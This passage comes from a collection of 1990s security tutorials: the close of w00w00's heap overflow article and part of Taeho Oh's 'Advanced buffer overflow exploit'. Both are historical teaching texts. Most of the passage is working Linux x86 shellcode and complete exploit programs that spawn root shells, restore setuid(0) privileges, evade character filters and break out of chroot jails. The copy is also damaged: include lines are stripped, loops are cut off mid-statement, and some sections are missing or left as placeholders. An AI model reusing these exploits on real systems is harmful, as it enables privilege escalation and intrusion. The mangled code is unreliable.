      printf("[vulprog] sp = 0x%lx\n\n", getesp());

      if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */
      {
         fprintf(stderr, "error: exploit didn't work\n");
         exit(ERROR);
      }

      printf("before:\n");
      printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
             jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

      printf("bp = %p, sp = %p, pc = %p\n\n",
             jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

      strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */

      printf("after:\n");
      printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
             jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

      printf("bp = %p, sp = %p, pc = %p\n\n",
             jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

      longjmp(jmpbuf, 1);
      return 0;
   }
 -----------------------------------------------------------------------------

 The reason we have the vulnerable program output its stack pointer (esp
 on x86) is that it makes "guessing" easier for the novice.

 And now the exploit for it (you should be able to follow it):
 -----------------------------------------------------------------------------
   /*
    * Copyright (C) January 1999, Matt Conover & WSD
    *
    * Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp)
    * to emulate a stack-based overflow in the heap.  By that I mean,
    * you would overflow the sp/pc of the jmpbuf.  When longjmp() is
    * called, it will execute the next instruction at that address.
    * Therefore, we can stick shellcode at this address (as the data/heap
    * section on most systems is executable), and it will be executed.
    *
    * This takes two arguments (offsets):
    *   arg 1 - stack offset (should be about 25-45).
    *   arg 2 - argv offset (should be about 310-330).
    */

   #include 
   #include 
   #include 
   #include 

   #define ERROR -1
   #define BUFSIZE 16

   #define VULPROG "./vulprog4"

   char shellcode[] = /* just aleph1's old shellcode (linux x86) */
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
      "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
      "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

   u_long getesp()
   {
      __asm__("movl %esp,%eax"); /* the return value goes in %eax */
   }

   int main(int argc, char **argv)
   {
      int stackaddr, argvaddr;
      register int index, i, j;

      char buf[BUFSIZE + 24 + 1];

      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s  \n",
                 argv[0]);

         fprintf(stderr, "[stack offset = offset to stack of vulprog\n");
         fprintf(stderr, "[argv offset = offset to argv[2]]\n");

         exit(ERROR);
      }

      stackaddr = getesp() - atoi(argv[1]);
      argvaddr = getesp() + atoi(argv[2]);

      printf("trying address 0x%lx for argv[2]\n", argvaddr);
      printf("trying address 0x%lx for sp\n\n", stackaddr);

      /*
       * The second memset() is needed, because otherwise some values
       * will be (null) and the longjmp() won't do our shellcode.
       */

      memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12);
      buf[BUFSIZE+24] = '\0';

      /* ------------------------------------- */

      /*
       * We need the stack pointer, because to set pc to our shellcode
       * address, we have to overwrite the stack pointer for jmpbuf.
       * Therefore, we'll rewrite it with the real address again.
       */

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(u_long); i++) /* setup BP */
      {
         index = BUFSIZE + 16 + i;
         buf[index] = (stackaddr >> (i * 8)) & 255;
      }

      /* ----------------------------- */

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(u_long); i++) /* setup SP */
      {
         index = BUFSIZE + 20 + i;
         buf[index] = (stackaddr >> (i * 8)) & 255;
      }

      /* ----------------------------- */

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(u_long); i++) /* setup PC */
      {
         index = BUFSIZE + 24 + i;
         buf[index] = (argvaddr >> (i * 8)) & 255;
      }

      execl(VULPROG, VULPROG, buf, shellcode, NULL);
      return 0;
   }
 -----------------------------------------------------------------------------

 Ouch, that was sloppy.  But anyway, when we run this with a stack offset
 of 36 and an argv[2] offset of 322, we get the following:
   [root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
   trying address 0xbffffcf6 for argv[2]
   trying address 0xbffffb90 for sp

   [vulprog] argv[2] = 0xbffffcf6
   [vulprog] sp = 0xbffffb90

   before:
   bx = 0x0, si = 0x40001fb0, di = 0x4000000f
   bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715

   after:
   bx = 0x1010101, si = 0x1010101, di = 0x1010101
   bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6

   bash#

 w00w00!  For those of you that are saying, "Okay.  I see this works in a
 controlled environment; but what about in the wild?"  There is sensitive
 data on the heap that can be overflowed.  Examples include:
      functions                       reason
   1. *gets()/*printf(), *scanf()     __iob (FILE) structure in heap
   2. popen()                         __iob (FILE) structure in heap
   3. *dir() (readdir, seekdir, ...)  DIR entries (dir/heap buffers)
   4. atexit()                        static/global function pointers
   5. strdup()                        allocates dynamic data in the heap
   7. getenv()                        stored data on heap
   8. tmpnam()                        stored data on heap
   9. malloc()                        chain pointers
   10. rpc callback functions         function pointers
   11. windows callback functions     func pointers kept on heap
   12. signal handler pointers        function pointers (note: unix tracks
       in cygnus (gcc for win),       these in the kernel, not in the heap)

 Now, you can definitely see some uses for these functions.  Room
 allocated for FILE structures in functions such as printf(), fgets(),
 readdir(), seekdir(), etc. can be manipulated (buffer or function
 pointers).  atexit() has function pointers that will be called when the
 program terminates.  strdup() can store strings (such as filenames or
 passwords) on the heap.  malloc()'s own chain pointers (inside its pool)
 can be manipulated to access memory it wasn't meant to access.  getenv()
 stores data on the heap, which would allow us to modify something such
 as $HOME after it's initially checked.  svc/rpc registration functions
 (librpc, libnsl, etc.) keep callback functions stored on the heap.

 We will demonstrate overwriting Windows callback functions and 
 overwriting FILE (__iob) structures (with popen).

 Once you know how to overwrite FILE structures with popen(), you can
 quickly figure out how to do it with other functions (e.g., *printf,
 *gets, *scanf, etc.), as well as DIR structures (because they are
 similar).

 Now for some case studies!  Our two "real world" vulnerabilities will be
 Solaris' tip and BSDI's crontab.  The BSDI crontab vulnerability
 was discovered by mudge of L0pht (see L0pht 1996 Advisory Page).  We're
 reusing it because it's a textbook example of a heap-based overflow
 (though we will use our own method of exploitation).

 Our first case study will be the BSDI crontab heap-based overflow.  We
 can pass a long filename, which will overflow a static buffer.  Above
 that buffer in memory, we have a pwd (see pwd.h) structure!  This stores
 a user's user name, password, uid, gid, etc.  By overwriting the uid/gid
 field of the pwd, we can modify the privileges that crond will run our
 crontab with (as soon as it tries to run our crontab).  This script could
 then put out a suid root shell, because our script will be running with
 uid/gid 0.

 Here is our exploit code:
 -----------------------------------------------------------------------------
 -----------------------------------------------------------------------------

 When we run it on a BSDI X.X machine, we get the following:
   [Put exploit output here]

 'tip' is run suid uucp on Solaris. It is possible to get root once uucp 
 privileges are gained (but, that's outside the scope of this article).
 Tip will overflow a static buffer when prompting for a file to 
 send/receive.  Above the static buffer in memory is a jmp_buf.  By
 overwriting the static buffer and then causing a SIGINT, we can get
 shellcode executed (by storing it in argv[]).  To exploit successfully,
 we need to either connect to a valid system, or create a "fake device" 
 to which tip will connect.

 Here is our tip exploit:
 -----------------------------------------------------------------------------
 -----------------------------------------------------------------------------

 When we run it on a Solaris 2.7 machine, we get the following:
   [Put exploit output here]

Possible Fixes (Workarounds)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Obviously, the best prevention for heap-based overflows is writing good
 code!  Similar to stack-based overflows, there is no real way of
 preventing heap-based overflows. 

 We can get a copy of the bounds checking gcc/egcs (which should locate
 most potential heap-based overflows) developed by Richard Jones and Paul
 Kelly.  This program can be downloaded from Richard Jones's homepage 
 at http://www.annexia.demon.co.uk.  It detects overruns that a human
 reviewer might miss.  One example they use is: "int array[10]; for (i =
 0; i <= 10; i++) array[i] = 1".  I have never used it.

 Note:
   For Windows, one could use NuMega's bounds checker which essentially
   performs the same as the bounds checking gcc.

 We can always make a non-executable heap patch (as mentioned earlier,
 most systems have an executable heap).  During a conversation I had with
 Solar Designer, he mentioned the main problems with a non-executable
 heap would involve compilers, interpreters, etc.

 Note:
   I added a note section here to reiterate the point that a
   non-executable heap does NOT prevent heap overflows at all.  It means
   we can't execute instructions in the heap.  It does NOT prevent us
   from overwriting data in the heap.

 Likewise, another possibility is to make a "HeapGuard", which would be
 the equivalent to Cowan's StackGuard mentioned earlier.  He (et al.) 
 also developed something called "MemGuard", but it's a misnomer.
 Its function is to prevent a return address on the stack from being
 overwritten (via canary values).  It does nothing to prevent overflows
 in the heap or bss.


Acknowledgements
~~~~~~~~~~~~~~~~
 There has been a significant amount of work on heap-based overflows in
 the past.  We ought to name some other people who have published work
 involving heap/bss-based overflows (though, our work wasn't based off
 them).

 Solar Designer: SuperProbe exploit (function pointers), color_xterm
 exploit (struct pointers), WebSite (pointer arrays), etc.
  
 L0pht: Internet Explorer 4.01 vulnerability (dildog), BSDI crontab
 exploit (mudge), etc. 

 Some others who have published exploits for heap-based overflows (thanks
 to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam
 Morrison (stdioflow).  I'm sure there are many others, and I apologize for
 excluding anyone.

 I'd also like to thank the following people who had some direct
 involvement in this article: str (stranJer), halflife, and jobe.
 Indirect involvements: Solar Designer, mudge, and other w00w00
 affiliates.

 Other good sources of info include: as/gcc/ld info files (/usr/info/*),
 BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00 
 (http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.

Epilogue:
  Most people who claim their systems are "secure" are saying so out of
  a lack of knowledge (ignorant seemed a little too strong).  Assuming
  security leads to a false sense of security (e.g., azrael.phrack.com
  has remote vulnerabilities involving heap-based overflows that have gone
  unnoticed for quite a while).  Hopefully, people will experiment with
  heap-based overflows, and in turn, will become more aware that the
  problems exist.  We need to realize that the problems are out there,
  waiting to be fixed.

Thanks for reading!  We hope you've enjoyed it!  You can e-mail me at
shok@dataforce.net, or mattc@repsec.com.  See the w00w00 (www.w00w00.org)
web site, also!

------------------------------------------------------------------------------
Matt Conover (a.k.a. Shok) & w00w00 Security Team

[ http://www.w00w00.org, w00w00 Security Development (WSD)  ]
[ See the URL above for information on: what w00w00 is, our ]
[ security projects (all available online), some of our     ]
[ articles, and more.  Enjoy! ]
 

Article 4

Advanced buffer overflow exploit


 Written by Taeho Oh ( ohhara@postech.edu )
----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
----------------------------------------------------------------------------


1. Introduction
 Nowadays there are many buffer overflow exploit codes. The early buffer
overflow exploit codes only spawned a shell ( execute /bin/sh ). However,
nowadays some buffer overflow exploit codes have very nice features,
for example passing through filtering, opening a socket, breaking chroot,
and so on. This paper will attempt to explain advanced buffer overflow
exploit techniques under Intel x86 Linux.

2. What do you have to know before reading?
 You have to know assembly language, the C language, and Linux. Of course,
you have to know what a buffer overflow is. You can find information about
buffer overflows in phrack 49-14 ( Smashing The Stack For Fun And Profit
by Aleph1 ). It is a wonderful paper on buffer overflows and I highly
recommend that you read it before reading this one.

3. Pass through filtering
 There are many programs which have buffer overflow problems. Why are not
all buffer overflow problems exploited? Because even if a program has a
buffer overflow condition, it can be hard to exploit. In many cases, the
reason is that the program filters some characters or converts characters
into other characters. If the program filters all non-printable characters,
it's too hard to exploit. If the program filters only some characters, you
can pass through the filter by making good buffer overflow exploit code. :)

3.1 The example vulnerable program

vulnerable1.c
----------------------------------------------------------------------------
#include
#include

int main(int argc,int **argv)
{
	char buffer[1024];
	int i;
	if(argc>1)
	{
		for(i=0;i
#include

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
	"\xeb\x38"                      /* jmp 0x38              */
	"\x5e"                          /* popl %esi             */
	"\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
	"\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
	"\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
	"\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
	"\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
	"\x89\xf0"                      /* movl %esi,%eax        */
	"\x83\xc0\x08"                  /* addl $0x8,%eax        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xd8"                      /* movl %ebx,%eax        */
	"\x40"                          /* inc %eax              */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
	"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */
	                                /* /bin/sh is disguised  */

unsigned long get_sp(void)
{
	__asm__("movl %esp,%eax");
}

main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i;

	if(argc>1)
		offset=atoi(argv[1]);

	sp=get_sp();
	addr=sp-offset;

	for(i=0;i>8;
		buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
		buff[i+ALIGN+3]=(addr&0xff000000)>>24;
	}

	for(i=0;i
#include

int main(int argc,char **argv)
{
	char buffer[1024];
	seteuid(getuid());
	if(argc>1)
		strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------

 This vulnerable program calls seteuid(getuid()) at the start. Therefore,
you may think that "strcpy(buffer,argv[1]);" is OK, because even a successful
buffer overflow attack would only give you your own shell. However,
seteuid() changes only the effective uid and the saved uid is still root,
so if you insert code which calls setuid(0) into the shellcode, you can get
a root shell. :)

4.2 Make setuid(0) code

setuidasm.c
----------------------------------------------------------------------------
main()
{
	setuid(0);
}
----------------------------------------------------------------------------

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
[ ohhara@ohhara ~ ] {2} $ gdb setuidasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble setuid
Dump of assembler code for function __setuid:
0x804ca00 <__setuid>:   movl   %ebx,%edx
0x804ca02 <__setuid+2>: movl   0x4(%esp,1),%ebx
0x804ca06 <__setuid+6>: movl   $0x17,%eax
0x804ca0b <__setuid+11>:        int    $0x80
0x804ca0d <__setuid+13>:        movl   %edx,%ebx
0x804ca0f <__setuid+15>:        cmpl   $0xfffff001,%eax
0x804ca14 <__setuid+20>:        jae    0x804cc10 <__syscall_error>
0x804ca1a <__setuid+26>:        ret    
0x804ca1b <__setuid+27>:        nop    
0x804ca1c <__setuid+28>:        nop    
0x804ca1d <__setuid+29>:        nop    
0x804ca1e <__setuid+30>:        nop    
0x804ca1f <__setuid+31>:        nop    
End of assembler dump.
(gdb)
----------------------------------------------------------------------------

setuid(0); code
----------------------------------------------------------------------------
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xb0\x17"                      /* movb $0x17,%al        */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

4.3 Modify the normal shellcode

 Making new shellcode is very easy if you make setuid(0) code. Just insert
the code into the start of the normal shellcode.

new shellcode
----------------------------------------------------------------------------
char shellcode[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xb0\x17"                      /* movb $0x17,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x1f"                      /* jmp 0x1f              */
	"\x5e"                          /* popl %esi             */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xd8"                      /* movl %ebx,%eax        */
	"\x40"                          /* inc %eax              */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xdc\xff\xff\xff"          /* call -0x24            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */
----------------------------------------------------------------------------

4.4 Exploit vulnerable2 program

 With this shellcode, you can make an exploit code easily.

exploit2.c
----------------------------------------------------------------------------
#include
#include

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xb0\x17"                      /* movb $0x17,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x1f"                      /* jmp 0x1f              */
	"\x5e"                          /* popl %esi             */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xd8"                      /* movl %ebx,%eax        */
	"\x40"                          /* inc %eax              */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xdc\xff\xff\xff"          /* call -0x24            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */

unsigned long get_sp(void)
{
	__asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i;

	if(argc>1)
		offset=atoi(argv[1]);

	sp=get_sp();
	addr=sp-offset;

	for(i=0;i<bsize;i+=4)
	{
		buff[i+ALIGN]=(addr&0x000000ff);
		buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
		buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
		buff[i+ALIGN+3]=(addr&0xff000000)>>24;
	}

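	for(i=0;i
	/* [The rest of exploit2.c is missing from this copy.]   */
----------------------------------------------------------------------------

[The opening of section 5, through the first lines of vulnerable3.c, is
missing from this copy.]

vulnerable3.c
----------------------------------------------------------------------------
#include <string.h>
#include <unistd.h>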

int main(int argc,char **argv)
{
	char buffer[1024];
	chroot("/home/ftp");
	chdir("/");
	if(argc>1)
		strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------

 If you try to execute "/bin/sh" through a buffer overflow in this program,
it executes "/home/ftp/bin/sh" (if it exists), and you cannot access any
directory outside "/home/ftp".

5.2 Make break chroot code
 If you can execute the code below, you can break out of the chroot.

breakchrootasm.c
----------------------------------------------------------------------------
main()
{
	mkdir("sh",0755);
	chroot("sh");
	/* many "../" */
	chroot("../../../../../../../../../../../../../../../../");
}
----------------------------------------------------------------------------

 This break chroot code creates a directory named "sh" because that name is
easy to reference: the string "sh" is already present at the end of
"/bin/sh", which the shellcode needs anyway to execute the shell.

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c
[ ohhara@ohhara ~ ] {2} $ gdb breakchrootasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble mkdir
Dump of assembler code for function __mkdir:
0x804cac0 <__mkdir>:    movl   %ebx,%edx
0x804cac2 <__mkdir+2>:  movl   0x8(%esp,1),%ecx
0x804cac6 <__mkdir+6>:  movl   0x4(%esp,1),%ebx
0x804caca <__mkdir+10>: movl   $0x27,%eax
0x804cacf <__mkdir+15>: int    $0x80
0x804cad1 <__mkdir+17>: movl   %edx,%ebx
0x804cad3 <__mkdir+19>: cmpl   $0xfffff001,%eax
0x804cad8 <__mkdir+24>: jae    0x804cc40 <__syscall_error>
0x804cade <__mkdir+30>: ret    
0x804cadf <__mkdir+31>: nop    
End of assembler dump.
(gdb) disassemble chroot
Dump of assembler code for function chroot:
0x804cb60 <chroot>:     movl   %ebx,%edx
0x804cb62 <chroot+2>:   movl   0x4(%esp,1),%ebx
0x804cb66 <chroot+6>:   movl   $0x3d,%eax
0x804cb6b <chroot+11>:  int    $0x80
0x804cb6d <chroot+13>:  movl   %edx,%ebx
0x804cb6f <chroot+15>:  cmpl   $0xfffff001,%eax
0x804cb74 <chroot+20>:  jae    0x804cc40 <__syscall_error>
0x804cb7a <chroot+26>:  ret
0x804cb7b <chroot+27>:  nop
0x804cb7c <chroot+28>:  nop
0x804cb7d <chroot+29>:  nop
0x804cb7e <chroot+30>:  nop
0x804cb7f <chroot+31>:  nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------

mkdir("sh",0755); code
----------------------------------------------------------------------------
	/* mkdir takes its first argument in %ebx and its second */
	/* in %ecx.                                              */
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb0\x27"                      /* movb $0x27,%al        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	/* %esi has to reference "/bin/sh" before this           */
	/* instruction, which loads the address of "sh" into     */
	/* %ebx.                                                 */
	"\xfe\xc5"                      /* incb %ch              */
	/* %cx = 0000 0001 0000 0000                             */
	"\xb1\xed"                      /* movb $0xed,%cl        */
	/* %cx = 0000 0001 1110 1101                             */
	/* %cx = 000 111 101 101                                 */
	/* %cx = 0   7   5   5                                   */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

chroot("sh"); code
----------------------------------------------------------------------------
	/* chroot first argument is ebx */
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

chroot("../../../../../../../../../../../../../../../../"); code
----------------------------------------------------------------------------
char code[]=
	"\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
	/* disguised "../" character string                      */
	"\xf7\xdb"                      /* negl %ebx             */
	/* %ebx = $0x002f2e2e                                    */
	/* intel x86 is little endian.                           */
	/* %ebx = "../"                                          */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb1\x10"                      /* movb $0x10,%cl        */
	/* prepare for looping 16 times.                         */
	"\x56"                          /* pushl %esi            */
	/* backup current %esi. %esi has the pointer of          */
	/* "/bin/sh".                                            */
	"\x01\xce"                      /* addl %ecx,%esi        */
	"\x89\x1e"                      /* movl %ebx,(%esi)      */
	"\x83\xc6\x03"                  /* addl $0x3,%esi        */
	"\xe0\xf9"                      /* loopne -0x7           */
	/* make "../../../../ . . . " character string at        */
	/* 0x10(%esi) by looping.                                */
	"\x5e"                          /* popl %esi             */
	/* restore %esi.                                         */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
	/* %ebx has the address of "../../../../ . . . ".        */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

5.3 Modify the normal shellcode

 Once you have the break chroot code, making the new shellcode is easy. Just
insert the code at the start of the normal shellcode and adjust the jmp and
call arguments.

new shellcode
----------------------------------------------------------------------------
char shellcode[]=
	"\xeb\x4f"                      /* jmp 0x4f              */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\x5e"                          /* popl %esi             */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\xb0\x27"                      /* movb $0x27,%al        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xfe\xc5"                      /* incb %ch              */
	"\xb1\xed"                      /* movb $0xed,%cl        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
	"\xf7\xdb"                      /* negl %ebx             */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb1\x10"                      /* movb $0x10,%cl        */
	"\x56"                          /* pushl %esi            */
	"\x01\xce"                      /* addl %ecx,%esi        */
	"\x89\x1e"                      /* movl %ebx,(%esi)      */
	"\x83\xc6\x03"                  /* addl $0x3,%esi        */
	"\xe0\xf9"                      /* loopne -0x7           */
	"\x5e"                          /* popl %esi             */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xac\xff\xff\xff"          /* call -0x54            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */
----------------------------------------------------------------------------

5.4 Exploit vulnerable3 program
 With this shellcode, writing the exploit code is straightforward.

exploit3.c
----------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
	"\xeb\x4f"                      /* jmp 0x4f              */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\x5e"                          /* popl %esi             */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\xb0\x27"                      /* movb $0x27,%al        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xfe\xc5"                      /* incb %ch              */
	"\xb1\xed"                      /* movb $0xed,%cl        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
	"\xf7\xdb"                      /* negl %ebx             */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb1\x10"                      /* movb $0x10,%cl        */
	"\x56"                          /* pushl %esi            */
	"\x01\xce"                      /* addl %ecx,%esi        */
	"\x89\x1e"                      /* movl %ebx,(%esi)      */
	"\x83\xc6\x03"                  /* addl $0x3,%esi        */
	"\xe0\xf9"                      /* loopne -0x7           */
	"\x5e"                          /* popl %esi             */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xac\xff\xff\xff"          /* call -0x54            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */

unsigned long get_sp(void)
{
	__asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i;

	if(argc>1)
		offset=atoi(argv[1]);

	sp=get_sp();
	addr=sp-offset;

